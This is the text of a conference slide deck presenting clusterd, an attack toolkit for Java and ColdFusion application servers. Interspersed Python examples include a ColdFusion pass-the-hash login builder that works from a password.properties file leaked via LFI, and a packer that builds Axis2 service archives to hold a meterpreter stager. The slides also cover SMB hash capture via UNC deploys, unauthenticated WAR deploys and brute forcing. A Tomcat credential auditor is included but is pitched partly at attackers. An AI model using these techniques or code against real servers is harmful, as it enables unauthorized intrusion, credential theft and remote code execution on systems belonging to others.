A Python-based, command-line-driven toolkit for attacking JBoss, Tomcat, WebLogic, ColdFusion, Railo and Axis2 servers. Discover vulnerabilities, exploit LFI, brute force credentials, and more.
clusterd: app server security Bryan Alexander
who • pentester @ Coalfire Labs • Independent researcher • Breaking via building
why? • ColdFusion 10 deployments? • JRun hash retrieval? • WebLogic anything? • Running versions? • JBoss 7.x/8.x deploys? • Brute forcing? • Railo? Axis2? WebSphere?! • More!?
what • clusterd; application server attack toolkit • Python-based, command-line driven • Support for JBoss, WebLogic, Tomcat, ColdFusion, Railo, …
what • JBoss • Tomcat • WebLogic • ColdFusion • Railo • Axis2
JBoss • So much has already been said (Matasano, Red Team Pentesting, HSC) • Let's talk about things that haven't been
JBoss Recap • Versions 3.x – 7.x are “JBoss” • Versions 8.x+ rebranded to “WildFly” • Make it rain shells with WARs • No authentication on the management consoles by default • clusterd currently features 7 unique deployers • Typically runs as an administrative/SYSTEM user
JBoss 7.x • One interface to rule them all (the HTTP/JSON management API) • They still haven't figured out how authentication works • Unauthenticated deploys via an exposed management interface
JBoss UNC • Not a new attack, but a new application • Point a deployer at a UNC path so JBoss (usually running as SYSTEM) fetches the "WAR" from an attacker-controlled SMB share; capture the NetNTLM hashes it authenticates with, then crack 'em
JBoss CVE-2005-2006 • An old information-disclosure bug; nobody is using it to fetch credentials
Jboss Auxiliary • Auxiliary modules used for scraping remote information
Tomcat Recap • Tomcat 3.x – 8.x; very consistent platform • Default creds! • Roles! the single manager role (Tomcat 6) vs. manager-gui (HTML UI) and manager-script (text API) on Tomcat 7+; a credential with only manager-gui cannot drive scripted deploys • clusterd currently deploys to everything
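The role split matters in practice: which manager endpoint a stolen or default credential unlocks depends on the roles granted in tomcat-users.xml. The following is an added example (not clusterd code) that audits a tomcat-users.xml for deploy-capable accounts and well-known default credentials. The sample file, the default-credential list and the role-to-endpoint table are constructed here from the roles the Tomcat 7+ manager webapp defines; the script ignores `<group>` membership and assumes plaintext passwords (digested passwords will never match the default list).

```python
import xml.etree.ElementTree as ET

# Roles the Tomcat 7+ manager webapp maps to its endpoints. On Tomcat 6 a
# single "manager" role covered all of /manager.
ROLE_ENDPOINTS = {
    "manager-gui": "/manager/html (HTML UI; form-upload deploy)",
    "manager-script": "/manager/text (text API; scripted deploy)",
    "manager-jmx": "/manager/jmxproxy",
    "manager-status": "/manager/status (read-only)",
    "manager": "/manager/* (Tomcat 6 legacy role)",
}
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager"}
TEXT_API_ROLES = {"manager-script", "manager"}

# Constructed list of well-known example credentials (the commented-out
# accounts in a stock tomcat-users.xml and the documentation examples).
KNOWN_DEFAULTS = {
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("both", "tomcat"),
    ("role1", "tomcat"), ("admin", "admin"), ("admin", ""),
}

# Constructed sample tomcat-users.xml (Tomcat 7 style, namespaced): one
# HTML-UI-only account, one scripted-deploy account with a default password,
# and one unprivileged account.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="tomcat"/>
  <user username="ops" password="Correct-Horse-1" roles="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-script,manager-gui"/>
  <user username="role1" password="tomcat" roles="tomcat"/>
</tomcat-users>
"""


def _local(tag):
    """Strip an XML namespace prefix: '{ns}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return one record per <user>: the manager endpoints its roles unlock,
    whether it can deploy at all, whether it can use the text API, and
    whether the credential pair is a well-known default."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        # Tomcat's MemoryUserDatabase accepts either 'username' or 'name'.
        name = el.get("username") or el.get("name") or ""
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        findings.append({
            "user": name,
            "roles": sorted(roles),
            "endpoints": [ROLE_ENDPOINTS[r] for r in sorted(roles) if r in ROLE_ENDPOINTS],
            "can_deploy": bool(roles & DEPLOY_ROLES),
            "text_api_deploy": bool(roles & TEXT_API_ROLES),
            "default_creds": (name, password) in KNOWN_DEFAULTS,
        })
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        flags = []
        if f["can_deploy"]:
            flags.append("DEPLOY" + ("(text API)" if f["text_api_deploy"] else "(HTML only)"))
        if f["default_creds"]:
            flags.append("DEFAULT-CREDS")
        print(f"{f['user']:<8} roles={','.join(f['roles']):<28} {' '.join(flags)}")
```

The same classification applies from the attacker's side: a brute-forced credential that only returns 403 on /manager/text may still deploy through /manager/html, so a deployer should try both endpoints before discarding the pair.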
Tomcat • Not much going on; all the standard modules
WebLogic • Oracle's own JBoss/Tomcat equivalent (still Java) • Very enterprise-y: clustering, systematic backups, etc. • Difficult to obtain older versions (which have default creds)
WebLogic • WebLogic supports deploying WAR files, and so does clusterd • Use the java/jsp_shell_*_tcp Metasploit payloads (the default in clusterd)
WebLogic • Two flavours of the admin interface: HTTP (port 7001) and HTTPS (port 9002) • Typically runs as a system service • In a clustered environment a deploy to the admin server can trickle down to every managed server in the domain • Very often seen in high-availability environments, i.e. systems running active/active
ColdFusion Recap • ColdFusion 6.x – 11.x • clusterd currently has three deployers for CF • LFI leading to hash disclosure in 6.x – 10.x • No cracking needed when you can pass the hash (the admin login hashes client-side) • No default credentials, but plenty of ways to get around that
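Why the leaked hash is enough on its own: on the CF 8/9 administrator login page the browser never sends the password. Its JavaScript submits `hex_hmac_sha1(salt, hex_sha1(password).toUpperCase())`, where the salt comes from the login page and the uppercase SHA-1 is exactly what password.properties stores, so anyone holding the stored hash can compute the same token. The following is an added example, not clusterd's code, that parses a constructed password.properties and builds the pass-the-hash login form. The storage scheme and the form field names (`cfadminUserId`, `cfadminPassword`, `salt`, `requestedURL`) are assumptions taken from the CF 8/9 login form; the `encrypted=false` branch (plaintext storage on older releases) is likewise an assumption.

```python
import hashlib
import hmac

# Constructed password.properties as returned by the CF admin LFI. The hash
# below is SHA-1("password") in uppercase hex.
SAMPLE_PASSWORD_PROPERTIES = """\
#Wed Aug 13 10:31:07 PDT 2014
rdspassword=5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
password=5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
encrypted=true
"""


def parse_password_properties(text):
    """Minimal Java .properties parser: key=value lines, '#'/'!' comments."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def cf_stored_hash(password):
    """Assumed CF 8/9 storage format: uppercase hex SHA-1 of the password."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def cf_login_token(stored_hash, salt):
    """Value the login form submits as cfadminPassword: HMAC-SHA1 keyed with
    the page's salt over the stored hash. Only the hash is needed here."""
    return hmac.new(salt.encode("utf-8"),
                    stored_hash.upper().encode("utf-8"),
                    hashlib.sha1).hexdigest()


def browser_login_token(password, salt):
    """What the login page's JavaScript computes from a typed password."""
    return cf_login_token(cf_stored_hash(password), salt)


def pth_login_form(properties_text, salt, username="admin"):
    """Build the POST body for /CFIDE/administrator/enter.cfm from a leaked
    password.properties plus the salt scraped from the login page."""
    props = parse_password_properties(properties_text)
    if props.get("encrypted", "true").lower() == "true":
        stored = props["password"]
    else:
        # Assumed: older installs may keep the password in clear; hash it the
        # way the browser would before keying the HMAC.
        stored = cf_stored_hash(props["password"])
    return {
        "cfadminUserId": username,
        "cfadminPassword": cf_login_token(stored, salt),
        "salt": salt,
        "requestedURL": "/CFIDE/administrator/index.cfm",
        "submit": "Login",
    }


if __name__ == "__main__":
    salt = "1408007467000"  # constructed; in practice scraped from the login page
    form = pth_login_form(SAMPLE_PASSWORD_PROPERTIES, salt)
    print(form["cfadminPassword"] == browser_login_token("password", salt))
```

The salt is only a replay guard for the token, not a protection for the hash: as long as the hash is reused across logins, disclosure of password.properties is equivalent to disclosure of the password.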
ColdFusion • Everybody knows the task scheduler can be used to deploy (save a fetched URL's output into the webroot) • 10.x+ restricts the output file extension (no CFML)
ColdFusion • How about LFI to RCE?
Railo • Railo 3.x – 4.x • Essentially just a FOSS ColdFusion • Task scheduler, plugin architecture, clustered servers, lots of development • Very permissive by default
Railo • No public vulnerabilities, yet... • Two admin interfaces: server.cfm (server-wide) and web.cfm (per web context) • Runs JSP and CFML, much like CF
Axis2 • Axis2 1.2 – 1.6 • Web services (SOAP/WSDL) engine; you deploy services, not applications • A couple of ways to deploy; clusterd currently supports one (recently added) • Default creds! • Last release was 2012, but still heavily used
Axis2 • Generating payloads is pretty simple, but vanilla msfpayload output won't deploy as-is • Generate a java/meterpreter/reverse_tcp, pack it into a JAR, and build the services.xml descriptor around it (an Axis2 service archive, .aar)
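What that packaging step actually produces: an .aar is a zip holding the compiled classes, an optional lib/ directory of dependency JARs and a META-INF/services.xml that names the service class and the operations Axis2 should expose. The following is an added example (not clusterd's packer) that builds and reads back such an archive. The class bytes are a constructed stand-in; a real build would use the .class produced by javac for the class that launches the stager, and the service name, class name and operation are placeholders.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Constructed stand-in for a compiled class (class-file magic followed by
# padding). Not a loadable class; only the archive layout is demonstrated.
FAKE_CLASS = b"\xca\xfe\xba\xbe" + b"\x00" * 28

RAW_XML_RECEIVER = "org.apache.axis2.receivers.RawXMLINOutMessageReceiver"


def build_services_xml(service_name, service_class, operations):
    """Axis2 service descriptor: the ServiceClass parameter plus one
    <operation> per exposed method, each wired to the raw XML receiver."""
    svc = ET.Element("service", name=service_name, scope="application")
    param = ET.SubElement(svc, "parameter", name="ServiceClass")
    param.text = service_class
    for op in operations:
        o = ET.SubElement(svc, "operation", name=op)
        ET.SubElement(o, "messageReceiver", {"class": RAW_XML_RECEIVER})
    return ET.tostring(svc, encoding="unicode")


def build_aar(service_name, service_class, class_files, operations, lib_jars=None):
    """Pack classes (path -> bytes, e.g. 'com/example/Shell.class'), optional
    lib/*.jar dependencies and META-INF/services.xml into an .aar."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("META-INF/services.xml",
                   build_services_xml(service_name, service_class, operations))
        for path, data in class_files.items():
            z.writestr(path, data)
        for name, data in (lib_jars or {}).items():
            z.writestr("lib/" + name, data)
    return buf.getvalue()


def inspect_aar(aar_bytes):
    """Read an .aar back: entry names plus service name, class and
    operations parsed from the descriptor."""
    with zipfile.ZipFile(io.BytesIO(aar_bytes)) as z:
        names = z.namelist()
        root = ET.fromstring(z.read("META-INF/services.xml"))
    cls = root.find("parameter[@name='ServiceClass']").text
    ops = [o.get("name") for o in root.findall("operation")]
    return {"entries": names, "service": root.get("name"),
            "class": cls, "operations": ops}


if __name__ == "__main__":
    aar = build_aar("Shell", "com.example.Shell",
                    {"com/example/Shell.class": FAKE_CLASS}, ["run"],
                    lib_jars={"stager.jar": b"PK\x05\x06" + b"\x00" * 18})
    print(inspect_aar(aar))
```

The archive is what the admin console's Upload Service page accepts; once Axis2 hot-deploys it, invoking the `run` operation over SOAP instantiates the service class, which is where the packed stager gets executed.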
Axis2 • LFI in 1.4.x; obviously we're going to fetch creds
other features • All platforms support brute forcing via a supplied wordlist
other features • Clean up after yourselves; every platform has an undeployer
other features • Discovery module
other features • Maybe demo?
FOSSy • Well-formed pull requests welcome • https://github.com/hatRiot/clusterd • Public to-do hosted on Trello • https://trello.com/b/Bwcmrsyd/clusterd • Research and 0days and fun stuff on my blog • http://hatriot.github.io/ • Tweet or email me your questions/bugs/requests • @dronesec (bryan.alexander@coalfire.com)
Questions? Comments?